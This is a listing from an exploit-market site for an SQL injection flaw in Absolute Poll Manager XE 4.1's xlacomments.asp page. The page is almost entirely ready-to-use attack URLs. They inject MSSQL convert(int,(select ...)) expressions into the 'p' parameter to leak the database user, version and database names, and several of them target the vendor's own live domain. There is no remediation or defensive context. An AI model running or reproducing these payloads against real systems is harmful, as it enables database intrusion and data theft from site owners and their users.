[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Absolute Poll Manager XE 4.1 (xlacomments.asp) SQL Injection Vuln

Author
Hakxer
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3878
Category
web applications
Date add
10-10-2008
Platform
asp
=================================================================
Absolute Poll Manager XE 4.1 (xlacomments.asp) SQL Injection Vuln
=================================================================


###############################################################################################
# Author : Hakxer
# Type Gap : Sql injection --((MSSQL Injection))--
#################################################################################################

### POC 
www.site.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))

### Exploit : 

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+@@version))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(1)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(2)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(3)))

###############################################################################

-------------------------------- The End of Gap -----------------------------------



#  0day.today [2024-07-07]  #